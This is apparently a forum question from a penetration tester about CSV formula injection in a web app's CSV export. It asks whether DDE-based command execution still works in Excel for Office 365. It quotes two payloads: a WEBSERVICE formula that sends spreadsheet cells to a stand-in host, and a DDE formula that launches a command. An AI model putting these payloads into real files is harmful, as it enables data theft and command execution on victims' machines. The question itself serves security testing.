I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as:
=WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50))
I am now trying to create a "more dangerous" payload and I see a lot of reference online using something such as:
=cmd|' /C calc'!A0
However, I can't find a way to have such a payload trigger, I always get a #REF!
error. Is this kind of attack still feasible in 2020 ? Or did Microsoft implement a mitigation for those attacks?
I'm running Excel for Office 365 version 1902.